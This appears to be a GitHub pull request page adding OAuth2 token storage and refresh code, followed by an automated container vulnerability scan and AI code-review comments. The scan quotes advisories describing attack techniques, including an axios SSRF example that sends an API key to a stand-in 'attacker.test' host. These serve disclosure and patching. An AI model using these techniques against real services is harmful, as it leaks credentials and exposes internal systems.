Add OAuth2 token management and storage implementation

[anatolyshipitz]

• Introduced OAuth2TokenManager for managing access and refresh tokens, including validation and automatic refreshing.
• Added FileTokenStorage for persistent token storage, allowing tokens to be saved and loaded from a file.
• Created IOAuth2TokenManager and TokenRefreshProvider interfaces to define the structure for token management and refreshing.
• Implemented OAuth2TokenRefreshProvider to handle token refresh logic using QuickBooks Online API.
• Added constants for token configuration and error messages to improve maintainability and clarity.

These changes enhance the application's OAuth2 integration, ensuring robust token management and storage capabilities.

[github-actions]

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest

digest	sha256:5c12eec75619200160da0e7d5bc8bff95e75bcf87a3273f218cb4f24f94b9d49
vulnerabilities
platform	linux/amd64
size	243 MB
packages	1628

📦 Base Image node:20-alpine

also known as	20-alpine3.21 20.19-alpine 20.19-alpine3.21 20.19.0-alpine 20.19.0-alpine3.21 iron-alpine iron-alpine3.21
digest	sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilities

stdlib 1.24.0 (golang) pkg:golang/[email protected] Affected range >=1.24.0-0 <1.24.2 Fixed version 1.24.2 EPSS Score 0.023% EPSS Percentile 4th percentile Description The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext. Affected range >=1.24.0-0 <1.24.4 Fixed version 1.24.4 EPSS Score 0.012% EPSS Percentile 1st percentile Description Calling Verify with a VerifyOptions.KeyUsages that contains ExtKeyUsageAny unintentionally disabledpolicy validation. This only affected certificate chains which contain policy graphs, which are rather uncommon.

form-data 4.0.0 (npm) pkg:npm/[email protected] Use of Insufficiently Random Values Affected range >=4.0.0 <4.0.4 Fixed version 4.0.4 CVSS Score 9.4 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N EPSS Score 0.076% EPSS Percentile 24th percentile Description Summary form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker: can observe other values produced by Math.random in the target application, and can control one field of a request made using form-data Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request. This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work. Details The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347 An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose) PoC PoC here: https://github.com/benweissmann/CVE-2025-7783-poc Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). Impact For an application to be vulnerable, it must: Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array) Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

samlify 2.9.0 (npm) pkg:npm/[email protected] Improper Verification of Cryptographic Signature Affected range <2.10.0 Fixed version 2.10.0 CVSS Score 9.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N EPSS Score 0.026% EPSS Percentile 6th percentile Description A Signature Wrapping attack has been found in samlify <v2.10.0, allowing an attacker to forge a SAML Response to authenticate as any user. An attacker would need a signed XML document by the identity provider.

form-data 2.5.3 (npm) pkg:npm/[email protected] Use of Insufficiently Random Values Affected range <2.5.4 Fixed version 2.5.4 CVSS Score 9.4 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N EPSS Score 0.076% EPSS Percentile 24th percentile Description Summary form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker: can observe other values produced by Math.random in the target application, and can control one field of a request made using form-data Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request. This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work. Details The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347 An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose) PoC PoC here: https://github.com/benweissmann/CVE-2025-7783-poc Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). Impact For an application to be vulnerable, it must: Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array) Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

tar-fs 2.1.2 (npm) pkg:npm/[email protected] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range >=2.0.0 <2.1.3 Fixed version 2.1.3 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N EPSS Score 0.112% EPSS Percentile 31st percentile Description Impact v3.0.8, v2.1.2, v1.16.4 and below Patches Has been patched in 3.0.9, 2.1.3, and 1.16.5 Workarounds You can use the ignore option to ignore non files/directories. ignore (_, header) { // pass files & directories, ignore e.g. symlinks return header.type !== 'file' && header.type !== 'directory' } Credit Thank you Caleb Brown from Google Open Source Security Team for reporting this in detail.

semver 5.3.0 (npm) pkg:npm/[email protected] Inefficient Regular Expression Complexity Affected range <5.7.2 Fixed version 5.7.2 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.418% EPSS Percentile 61st percentile Description Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

pdfjs-dist 2.16.105 (npm) pkg:npm/[email protected] Improper Check for Unusual or Exceptional Conditions Affected range <=4.1.392 Fixed version 4.2.67 CVSS Score 8.8 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H EPSS Score 31.580% EPSS Percentile 97th percentile Description Impact If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain. Patches The patch removes the use of eval: mozilla/pdf.js#18015 Workarounds Set the option isEvalSupported to false. References https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

axios 1.7.4 (npm) pkg:npm/[email protected] Server-Side Request Forgery (SSRF) Affected range >=1.0.0 <1.8.2 Fixed version 1.8.2 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P EPSS Score 0.026% EPSS Percentile 5th percentile Description Summary A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463 A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. Details Consider the following code snippet: import axios from "axios"; const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, }); // const userId = "123"; const userId = "http://attacker.test/"; await internalAPIClient.get(userId); // SSRF In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers. It is recommended that: When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL. Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL. PoC Follow the steps below to reproduce the issue: Set up two simple HTTP servers: mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 & Create a script (e.g., main.js): import axios from "axios"; const client = axios.create({ baseURL: "http://localhost:10001/" }); const response = await client.get("http://localhost:10002/"); console.log(response.data); Run the script: $ node main.js this is server2 Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/. Impact Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed. SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running. Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

cross-spawn 7.0.3 (npm) pkg:npm/[email protected] Inefficient Regular Expression Complexity Affected range >=7.0.0 <7.0.5 Fixed version 7.0.5 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P EPSS Score 0.155% EPSS Percentile 37th percentile Description Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

multer 1.4.5-lts.2 (npm) pkg:npm/[email protected] Missing Release of Memory after Effective Lifetime Affected range <2.0.0 Fixed version 2.0.0 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.018% EPSS Percentile 3rd percentile Description Impact Multer <2.0.0 is vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal busboy stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Patches Users should upgrade to 2.0.0 Workarounds None References fix: MEMORY LEAK expressjs/multer#1120 expressjs/multer@2c8505f

[coderabbitai]

📝 Walkthrough

Walkthrough

This change introduces a comprehensive OAuth2 token management subsystem. It adds new classes for file-based token storage, token refresh via QuickBooks Online, and a token manager that handles token lifecycle, concurrency, and error handling. Supporting TypeScript interfaces, constants, and error classes are included. Extensive unit tests validate storage, refresh, and error scenarios.

Changes

Cohort / File(s)	Change Summary
OAuth2 Token Storage & Management workers/main/src/services/OAuth2/FileTokenStorage.ts, workers/main/src/services/OAuth2/OAuth2TokenManager.ts, workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts, workers/main/src/services/OAuth2/constants.ts, workers/main/src/services/OAuth2/types.ts	Introduces file-based token storage (FileTokenStorage), a token manager (OAuth2TokenManager) with persistent and concurrent-safe token lifecycle management, a provider for refreshing tokens with QBO (OAuth2TokenRefreshProvider), supporting constants, and TypeScript interfaces for token handling.
OAuth2 Error Handling workers/main/src/common/errors/OAuth2Error.ts, workers/main/src/common/errors/index.ts	Adds a specialized OAuth2Error class extending AppError and exports it via the errors index for use in OAuth2 workflows.
OAuth2 Error Unit Test workers/main/src/common/errors/OAuth2Error.test.ts	Adds a unit test to verify the constructor and properties of the OAuth2Error class.
OAuth2 Token Manager Unit Tests workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts, workers/main/src/services/OAuth2/OAuth2TokenManager.errors.test.ts, workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts	Introduces comprehensive unit tests for OAuth2TokenManager, covering basic usage, error handling, storage integration, and edge cases using Vitest and extensive mocking.
FileTokenStorage Unit Tests workers/main/src/services/OAuth2/FileTokenStorage.basic.test.ts, workers/main/src/services/OAuth2/FileTokenStorage.clear.test.ts, workers/main/src/services/OAuth2/FileTokenStorage.load.test.ts	Adds unit tests for FileTokenStorage class covering basic functionality, save, clear, and load methods, including error handling and edge cases with mocked filesystem operations.
OAuth2TokenRefreshProvider Unit Test workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.test.ts	Adds basic instantiation and method presence tests for the OAuth2TokenRefreshProvider class.

Sequence Diagram(s)

sequenceDiagram
    participant Client
    participant OAuth2TokenManager
    participant FileTokenStorage
    participant OAuth2TokenRefreshProvider

    Client->>OAuth2TokenManager: getAccessToken()
    alt Token is valid
        OAuth2TokenManager-->>Client: Return cached access token
    else Token expired or missing
        OAuth2TokenManager->>FileTokenStorage: load()
        alt Token data valid and not expired
            OAuth2TokenManager-->>Client: Return loaded access token
        else Need refresh
            OAuth2TokenManager->>OAuth2TokenRefreshProvider: refreshToken(refresh_token)
            alt Refresh success
                OAuth2TokenManager->>FileTokenStorage: save(new token data)
                OAuth2TokenManager-->>Client: Return new access token
            else Refresh fails (invalid_grant, etc.)
                OAuth2TokenManager->>FileTokenStorage: clear()
                OAuth2TokenManager-->>Client: Throw OAuth2Error
            end
        end
    end

Loading

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~45 minutes

Suggested reviewers

• killev

Note

⚡️ Unit Test Generation is now available in beta!

Learn more here, or try it out under "Finishing Touches" below.

✨ Finishing Touches

• 📝 Generate Docstrings

🧪 Generate unit tests

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch feature/65031_oauth_service

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

• Review comments: Directly reply to a review comment made by CodeRabbit. Example:
  • I pushed a fix in commit <commit_id>, please review it.
  • Explain this complex logic.
  • Open a follow-up GitHub issue for this discussion.
• Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
  • @coderabbitai explain this code block.
  • @coderabbitai modularize this function.
• PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
  • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
  • @coderabbitai read src/utils.ts and explain its main purpose.
  • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
  • @coderabbitai help me debug CodeRabbit configuration file.

Support

Need help? Create a ticket on our support page for assistance with any issues or questions.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

• @coderabbitai pause to pause the reviews on a PR.
• @coderabbitai resume to resume the paused reviews.
• @coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
• @coderabbitai full review to do a full review from scratch and review all the files again.
• @coderabbitai summary to regenerate the summary of the PR.
• @coderabbitai generate docstrings to generate docstrings for this PR.
• @coderabbitai generate sequence diagram to generate a sequence diagram of the changes in this PR.
• @coderabbitai generate unit tests to generate unit tests for this PR.
• @coderabbitai resolve resolve all the CodeRabbit review comments.
• @coderabbitai configuration to show the current CodeRabbit configuration for the repository.
• @coderabbitai help to get help.

Other keywords and placeholders

• Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
• Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
• Add @coderabbitai anywhere in the PR title to generate the title automatically.

CodeRabbit Configuration File (.coderabbit.yaml)

• You can programmatically configure CodeRabbit by adding a .coderabbit.yaml file to the root of your repository.
• Please see the configuration documentation for more information.
• If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json

Documentation and Community

• Visit our Documentation for detailed information on how to use CodeRabbit.
• Join our Discord Community to get help, request features, and share feedback.
• Follow us on X/Twitter for updates and announcements.

[coderabbitai]

Actionable comments posted: 6

♻️ Duplicate comments (1)

workers/main/src/services/OAuth2/OAuth2TokenManager.test.ts (1)

91-95: Same issue: avoid type casting to access private methods.

This duplicates the same problematic pattern of accessing private methods via type casting.

🧹 Nitpick comments (7)

workers/main/src/services/OAuth2/types.ts (1)

1-43: Excellent type definitions with clear separation of concerns.

The interfaces are well-designed with good separation between raw API responses (TokenResponse) and internal data structures (TokenData). The conversion from expires_in to expires_at timestamp is smart for easier validation logic.

Consider adding JSDoc comments to clarify that expires_at represents Unix timestamp in milliseconds, and when the optional fields in TokenManagementResult are populated.

workers/main/src/services/OAuth2/FileTokenStorage.ts (3)

33-50: Consider making the load method async for consistency.

The API mixes async (save, clear) and sync (load) methods. Making load async would provide consistency and allow for better error handling.

-  load(): TokenData | null {
+  async load(): Promise<TokenData | null> {
     try {
-      const data = readFileSync(this.tokenFilePath, 'utf8');
+      const data = await fs.readFile(this.tokenFilePath, 'utf8');

Remember to update the interface and all callers accordingly.

---

47-49: Remove redundant null return.

Line 48 returns null after the ENOENT check already returned null on line 45. This code is unreachable.

-      return null;
-    }
-
-    return null;
+    }
+    return null;

---

8-72: Consider security implications of plaintext token storage.

Storing OAuth2 tokens in plaintext files poses security risks. Consider implementing encryption or using more secure storage mechanisms, especially for production environments.

You might want to:

• Encrypt tokens before writing to disk
• Set restrictive file permissions (600)
• Use environment-specific secure storage (e.g., AWS Secrets Manager, Azure Key Vault)
• Add file locking to prevent concurrent access issues

workers/main/src/services/OAuth2/IOAuth2TokenManager.ts (1)

1-61: Excellent interface design with clear separation of concerns.

The interfaces are well-structured with good separation of responsibilities:

• TokenStorageProvider handles persistence operations
• TokenRefreshProvider focuses on token refresh logic
• IOAuth2TokenManager provides the main public API

The JSDoc documentation is comprehensive and the method signatures are clean and intuitive.

Minor suggestion: Consider documenting whether getCurrentRefreshToken() can return empty/null values and how callers should handle such cases.

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (2)

21-27: Consider dependency injection for better testability

While the implementation works, hardcoding dependencies makes unit testing more difficult. Consider accepting storage and refresh provider as constructor parameters with defaults.

-  constructor(serviceName: string, defaultRefreshToken: string) {
-    this.storage = new FileTokenStorage(serviceName);
-    this.refreshProvider = new OAuth2TokenRefreshProvider();
+  constructor(
+    serviceName: string,
+    defaultRefreshToken: string,
+    storage?: TokenStorageProvider,
+    refreshProvider?: TokenRefreshProvider
+  ) {
+    this.storage = storage ?? new FileTokenStorage(serviceName);
+    this.refreshProvider = refreshProvider ?? new OAuth2TokenRefreshProvider();
     this.defaultRefreshToken = defaultRefreshToken;

     this.loadTokens();
   }

---

162-165: Incomplete logging implementation

The method has a condition check but no implementation. Either implement the logging or remove the method if not needed.

Would you like me to implement the refresh token change logging or create an issue to track this TODO?

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 1d86d9f and 29d31e9.

📒 Files selected for processing (7)

• workers/main/src/services/OAuth2/FileTokenStorage.ts (1 hunks)
• workers/main/src/services/OAuth2/IOAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts (1 hunks)
• workers/main/src/services/OAuth2/constants.ts (1 hunks)
• workers/main/src/services/OAuth2/types.ts (1 hunks)

🧰 Additional context used

🧠 Learnings (1)

📓 Common learnings

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

🔇 Additional comments (6)

workers/main/src/services/OAuth2/constants.ts (1)

1-14: LGTM! Well-structured constants with proper typing.

The constants are well-organized and appropriately typed with as const. The token buffer configuration (5 minutes + 60 seconds) provides reasonable safety margins for token refresh operations, and the error messages are descriptive.

workers/main/src/services/OAuth2/OAuth2TokenRefreshProvider.ts (3)

9-36: Well-implemented OAuth2 token refresh flow!

The method correctly implements the OAuth2 refresh token grant type with proper form encoding and Basic authentication.

---

38-69: Comprehensive error handling with clear user guidance!

The error handler effectively covers all common OAuth2 error scenarios with actionable error messages.

---

71-86: Smart token expiry calculation with buffer!

The method correctly implements early token refresh by subtracting a buffer from the expiry time, preventing token expiration during API calls.

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (2)

47-57: Thorough token validation logic!

Good defensive programming with explicit checks for null, undefined, and empty tokens.

---

73-90: Excellent concurrency control for token refresh!

The implementation properly prevents race conditions by tracking and awaiting existing refresh operations.

[coderabbitai]

Actionable comments posted: 4

♻️ Duplicate comments (2)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (2)

60-72: Avoid empty catch blocks - log storage errors

The empty catch block silently ignores storage errors, making debugging difficult.

       if (tokenData) {
         this.setTokenData(tokenData);
       }
-    } catch {}
+    } catch (error) {
+      console.warn('Failed to load tokens from storage:', error);
+    }

---

113-122: Log storage clear errors

The empty catch block silently ignores storage errors.

     try {
       await this.storage.clear();
-    } catch {}
+    } catch (error) {
+      console.warn('Failed to clear stored tokens:', error);
+    }

🧹 Nitpick comments (1)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1)

156-158: Consider restricting test method visibility

The setTokenDataForTesting method is public and could be misused in production code.

Consider adding a comment to clarify its purpose:

+  /**
+   * @internal For testing purposes only. Do not use in production code.
+   */
   setTokenDataForTesting(tokenData: TokenData): void {
     this.setTokenData(tokenData);
   }

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6e28da6 and d4d0f2e.

📒 Files selected for processing (7)

• workers/main/src/common/errors/OAuth2Error.ts (1 hunks)
• workers/main/src/services/OAuth2/IOAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.errors.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1 hunks)
• workers/main/src/services/OAuth2/types.ts (1 hunks)

🚧 Files skipped from review as they are similar to previous changes (3)

• workers/main/src/common/errors/OAuth2Error.ts
• workers/main/src/services/OAuth2/IOAuth2TokenManager.ts
• workers/main/src/services/OAuth2/types.ts

🧰 Additional context used

🧠 Learnings (1)

📓 Common learnings

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.

🪛 GitHub Check: SonarQube

workers/main/src/services/OAuth2/OAuth2TokenManager.storage.test.ts

[failure] 105-105: src/services/OAuth2/OAuth2TokenManager.storage.test.ts > OAuth2TokenManager - Storage & Edge Cases > should handle malformed token data from storage
AssertionError: expected 'refresh-token' to be 'test-refresh-token' // Object.is equality

Expected: "test-refresh-token"
Received: "refresh-token"

❯ src/services/OAuth2/OAuth2TokenManager.storage.test.ts:105:54

workers/main/src/services/OAuth2/OAuth2TokenManager.errors.test.ts

[failure] 141-141: src/services/OAuth2/OAuth2TokenManager.errors.test.ts > OAuth2TokenManager - Error Handling > token refresh logic > should handle refresh token failure with other errors
AssertionError: expected [Function] to throw error including 'Network error' but got 'Cannot read properties of undefined (…'

Expected: "Network error"
Received: "Cannot read properties of undefined (reading 'access_token')"

❯ src/services/OAuth2/OAuth2TokenManager.errors.test.ts:141:7

---

[failure] 114-114: src/services/OAuth2/OAuth2TokenManager.errors.test.ts > OAuth2TokenManager - Error Handling > token refresh logic > should handle refresh token failure with invalid token error
AssertionError: expected [Function] to throw error including 'invalid or expired refresh token' but got 'Cannot read properties of undefined (…'

Expected: "invalid or expired refresh token"
Received: "Cannot read properties of undefined (reading 'access_token')"

❯ src/services/OAuth2/OAuth2TokenManager.errors.test.ts:114:7

---

[failure] 86-86: src/services/OAuth2/OAuth2TokenManager.errors.test.ts > OAuth2TokenManager - Error Handling > getAccessToken error scenarios > should handle empty access token after refresh
AssertionError: expected [Function] to throw error including 'Failed to obtain access token' but got 'Cannot read properties of undefined (…'

Expected: "Failed to obtain access token"
Received: "Cannot read properties of undefined (reading 'access_token')"

❯ src/services/OAuth2/OAuth2TokenManager.errors.test.ts:86:7

---

[failure] 57-57: src/services/OAuth2/OAuth2TokenManager.errors.test.ts > OAuth2TokenManager - Error Handling > getAccessToken error scenarios > should throw error when no access token available after refresh
AssertionError: expected [Function] to throw error including 'Failed to obtain access token' but got 'Cannot read properties of undefined (…'

Expected: "Failed to obtain access token"
Received: "Cannot read properties of undefined (reading 'access_token')"

❯ src/services/OAuth2/OAuth2TokenManager.errors.test.ts:57:7

workers/main/src/services/OAuth2/OAuth2TokenManager.ts

[failure] 98-98: src/services/OAuth2/OAuth2TokenManager.basic.test.ts > OAuth2TokenManager - Basic > getAccessToken > should refresh token when expired and return new access token
TypeError: this.refreshProvider.refreshToken is not a function
❯ OAuth2TokenManager.performTokenRefresh src/services/OAuth2/OAuth2TokenManager.ts:98:36
❯ OAuth2TokenManager.refreshAccessToken src/services/OAuth2/OAuth2TokenManager.ts:85:32
❯ OAuth2TokenManager.getAccessToken src/services/OAuth2/OAuth2TokenManager.ts:35:16
❯ src/services/OAuth2/OAuth2TokenManager.basic.test.ts:142:46

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (1)

workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts (1)

1-147: LGTM! Well-structured test suite with comprehensive coverage

The test file demonstrates good practices:

• Clear test organization with descriptive test names
• Proper setup and teardown with beforeEach and afterEach
• Comprehensive coverage of basic functionality
• Good use of test data setup

The mocking approach here is more robust than in the error tests file.

[coderabbitai]

Actionable comments posted: 2

♻️ Duplicate comments (1)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1)

139-143: Token data validation trade-off acknowledged.

While previous feedback suggested adding validation to setTokenData for malformed token data, I understand your preference for keeping implementations simple during early development stages. The current approach prioritizes core functionality over comprehensive validation.

If you encounter issues with malformed token data during testing, validation can be added later when moving toward production readiness.

🧹 Nitpick comments (1)

workers/main/src/services/OAuth2/OAuth2TokenManager.ts (1)

22-28: Consider async initialization pattern for better error handling.

The constructor calls loadTokens() which can throw OAuth2Error (line 68), making the constructor potentially throw. This can be surprising to users and makes error handling more complex.

Consider implementing an async initialize() method that can be called after construction to handle storage loading errors more gracefully.

  constructor(serviceName: string, defaultRefreshToken: string) {
    this.storage = new FileTokenStorage(serviceName);
    this.refreshProvider = new OAuth2TokenRefreshProvider();
    this.defaultRefreshToken = defaultRefreshToken;
-
-   this.loadTokens();
  }
+
+ async initialize(): Promise<void> {
+   this.loadTokens();
+ }

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between d4d0f2e and 60c0b1c.

📒 Files selected for processing (5)

• workers/main/src/services/OAuth2/OAuth2TokenManager.basic.test.ts (1 hunks)
• workers/main/src/services/OAuth2/OAuth2TokenManager.errors.test.ts (1 hunks)
